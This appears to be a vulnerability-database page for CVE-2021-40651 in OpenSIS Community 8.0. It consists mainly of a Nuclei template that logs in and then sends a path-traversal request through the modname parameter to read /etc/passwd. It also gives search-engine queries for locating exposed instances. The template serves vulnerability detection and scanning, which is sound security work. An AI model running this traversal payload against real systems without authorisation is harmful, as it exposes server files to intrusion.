CVE-2021-40651: OS4Ed OpenSIS Community 8.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: OS4Ed OpenSIS Community 8.0 | POC: 已公开

漏洞描述

OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.

PoC代码[已公开]

id: CVE-2021-40651

info:
  name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
  reference:
    - https://www.exploit-db.com/exploits/50259
    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
    - https://www.youtube.com/watch?v=wFwlbXANRCo
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-40651
    cwe-id: CWE-22
    epss-score: 0.55433
    epss-percentile: 0.97997
    cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query:
      - "title:\"openSIS\""
      - http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2021,lfi,os4ed,opensis,authenticated

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(body_1, "openSIS")'
          - "status_code == 200"
        condition: and
# digest: 490a00463044022021d98f8de61e19f5ffcb1805b4d038debc5f6d810aecbe910f766c08ffac6b2602205636ba28e2d0dae987d24997c8ed52ec5ec2e12f509a987f696bc2fb76d0b55d:922c64590222798bb761d5b6d8e72950